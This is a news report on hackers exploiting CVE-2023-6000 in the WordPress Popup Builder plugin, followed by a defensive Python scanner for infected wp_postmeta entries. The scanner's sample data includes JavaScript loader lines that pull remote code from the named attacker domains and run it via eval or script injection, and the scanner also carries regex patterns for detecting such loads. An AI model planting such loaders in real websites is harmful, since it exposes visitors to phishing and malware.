A vulnerability in outdated versions of the Popup Builder plugin for WordPress is being exploited by hackers, leading to breaches on numerous websites. Over 3,300 websites have been infected with malicious code as a result.
The specific flaw being exploited, known as CVE-2023-6000, is a cross-site scripting (XSS) vulnerability affecting Popup Builder versions 4.2.3 and older. This vulnerability was first disclosed in November 2023.
Earlier this year, a campaign called Balada Injector took advantage of this vulnerability to infect more than 6,700 websites, indicating that many site administrators had not promptly patched their systems.
Sucuri, a cybersecurity firm, has identified a recent surge in attacks targeting the same vulnerability in the WordPress plugin over the past three weeks.
According to findings from PublicWWW, instances of code injections associated with this latest campaign have been discovered on 3,329 WordPress sites, with Sucuri’s scanners detecting 1,170 infections.
The malicious code is typically injected into the Custom JavaScript or Custom CSS sections of the WordPress admin interface, and it is stored within the ‘wp_postmeta’ database table.
This code primarily functions as event handlers for various Popup Builder plugin events, enabling actions such as popup openings and closings to trigger the execution of malicious code.
Sucuri notes that while the exact actions of the injected code may vary, its primary objective appears to be redirecting visitors of infected sites to malicious destinations, such as phishing pages and sites distributing malware.
One observed variant of the injection involves retrieving a malicious code snippet from an external source and injecting it into the webpage head for execution by the browser.
This method allows attackers to achieve various malicious goals, potentially more severe than simple redirections.
To defend against these attacks, it is recommended to block the domains “ttincoming.traveltraffic[.]cc” and “host.cloudsonicwave[.]com” from which the attacks originate.
Additionally, website owners using the Popup Builder plugin should update to the latest version (currently 4.2.7), which addresses CVE-2023-6000 and other security issues.
Despite the availability of patches, a significant number of active sites—estimated to be at least 80,000—are still using Popup Builder versions 4.1 and older, leaving them vulnerable to exploitation.
In the event of an infection, the removal process involves deleting malicious entries from the Popup Builder’s custom sections and conducting scans to identify and remove any hidden backdoors to prevent reinfection.
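As an added illustration (not code from the article or from Sucuri), the following Python scans exported `wp_postmeta` rows for the Popup Builder custom-code entries described above, flagging values that reference the two domains the article names or that load a script from any other external host. The `meta_key` names for the Custom JavaScript/CSS sections and the sample rows are assumptions constructed for the example.

```python
import re

# Domains named in the article, kept defanged; refang() restores the dots.
KNOWN_BAD_DOMAINS = ["ttincoming.traveltraffic[.]cc", "host.cloudsonicwave[.]com"]

# Assumed meta_key names for the plugin's Custom JavaScript / Custom CSS
# sections (hypothetical; confirm against your own wp_postmeta contents).
CUSTOM_CODE_KEYS = {"sg_popup_custom_js", "sg_popup_custom_css"}

# Constructed sample rows: (meta_id, post_id, meta_key, meta_value)
SAMPLE_ROWS = [
    (101, 12, "sg_popup_custom_js", "jQuery('#cta').on('click', function () { sgPopupClose(); });"),
    (102, 12, "sg_popup_custom_css", ".sg-popup { color: #333; }"),
    (103, 15, "sg_popup_custom_js",
     "var s=document.createElement('script');s.src='https://ttincoming.traveltraffic.cc/ld.js';"
     "document.head.appendChild(s);"),
    (104, 18, "sg_popup_custom_js",
     "fetch('https://host.cloudsonicwave.com/p.js').then(r=>r.text()).then(eval);"),
    (105, 20, "_edit_lock", "1710000000:1"),  # unrelated key, must be ignored
]

# Matches a script src assignment, <script src=...>, fetch() or import() of a remote URL
# and captures the host part so we can judge whether it is external.
EXTERNAL_LOAD = re.compile(r"""(?:\bsrc\s*=\s*|fetch\(|import\()['"]?https?://([^/'"\s)]+)""", re.I)

def refang(indicator: str) -> str:
    """Turn a defanged indicator such as host[.]example into host.example."""
    return indicator.replace("[.]", ".")

def scan_postmeta(rows, bad_domains=KNOWN_BAD_DOMAINS, keys=CUSTOM_CODE_KEYS, own_hosts=()):
    """Return a list of findings for custom-code rows that contain a known
    indicator or load a script from a host not in own_hosts."""
    bad = {refang(d).lower() for d in bad_domains}
    own = {h.lower() for h in own_hosts}
    findings = []
    for meta_id, post_id, meta_key, meta_value in rows:
        if meta_key not in keys:
            continue                      # only the plugin's custom JS/CSS sections
        value = meta_value or ""
        reasons = [f"known indicator {d}" for d in sorted(bad) if d in value.lower()]
        for match in EXTERNAL_LOAD.finditer(value):
            host = match.group(1).lower()
            if host not in own:
                reasons.append(f"loads external script from {host}")
        if reasons:
            findings.append({"meta_id": meta_id, "post_id": post_id,
                             "meta_key": meta_key, "reasons": reasons})
    return findings
```

Rows it reports are candidates for the manual clean-up step; a hit on a host that is not in the known list still deserves a look, since the article notes the loader variant fetches its payload from an external source.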